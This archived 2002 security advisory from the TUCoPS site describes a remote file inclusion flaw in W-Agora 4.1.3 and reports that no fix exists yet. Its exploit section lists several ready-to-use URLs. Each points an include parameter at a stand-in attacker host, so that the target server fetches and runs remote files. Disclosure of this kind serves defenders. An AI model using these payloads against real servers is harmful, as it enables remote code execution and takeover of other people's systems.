Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Apps :: web5450.htm

W-Agora remote file injection



14th Jun 2002 [SBWID-5450]
COMMAND

	W-Agora remote file injection

SYSTEMS AFFECTED

	W-Agora 4.1.3

PROBLEM

	frog-m@n [leseulfrog@hotmail.com] found that it is  possible  to  inject
	arbitrary files on server running W-Agora.
	

	 Exploit

	 =======

	

	

	- With a file http://www.attacker.com/dbaccess.txt :

	http://[target]/include/oci8.php?inc_dir=http://www.attacker.com&ext=txt

	http://[target]/include/postgres65.php?inc_dir=http://www.attacker.com&ext=txt

	http://[target]/include/mysql.php?inc_dir=http://www.attacker.com&ext=txt

	http://[target]/include/mssql7.php?inc_dir=http://www.attacker.com&ext=txt

	http://[target]/include/msql.php?inc_dir=http://www.attacker.com&ext=txt

	

	- With a file http://www.attacker.com/postgres65.txt :

	http://[target]/include/postgres.php?inc_dir=http://www.attacker.com&ext=txt

	

	- With the file http://www.attacker.com/auth.txt :

	http://[target]/user/agora_user.php?inc_dir=http://www.attacker.com&ext=txt

	http://[target]/user/ldap_example.php?inc_dir=http://www.attacker.com&ext=txt

	

	

	More details in french :
	

	http://www.ifrance.com/kitetoua/tuto/W-Agora.txt

	

	

	Translated by Goolge :
	

	http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FW-Agora.txt&langpair=fr%7Cen&hl=fr&prev=%2Flanguage_tools

	

SOLUTION

	Nothing yet.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH